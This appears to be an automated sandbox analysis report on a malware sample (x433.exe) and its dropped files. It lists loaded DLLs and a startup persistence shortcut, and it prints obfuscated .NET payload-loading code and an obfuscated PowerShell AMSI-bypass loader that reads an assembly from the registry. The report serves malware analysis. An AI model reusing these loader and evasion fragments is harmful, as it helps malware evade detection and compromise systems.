Source: C:\Users\user\Desktop\x433.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\x433.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\spoolsv.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\x4usb.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Users\user\Desktop\x433.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: x4usb.lnk.2.dr LNK file: ..\..\..\..\..\..\Local\x4usb.exe
Source: C:\Users\user\Desktop\x433.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: x433.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: x433.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw System.AppDomain.Load(byte[])
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02 System.AppDomain.Load(byte[])
Source: x4usb.exe.2.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs .Net Code: ohdrG5IJE4RXttz6wzxNRbjo11VI02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($JhuBDoUfjiRKob,$tYvGzbpkOpfGRXdvJJH).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$nrzKdroJBYOrdatEY=$VrBFKSFCQkTmpL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](120)+''+'4'+''+[Char](115)+''+[
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 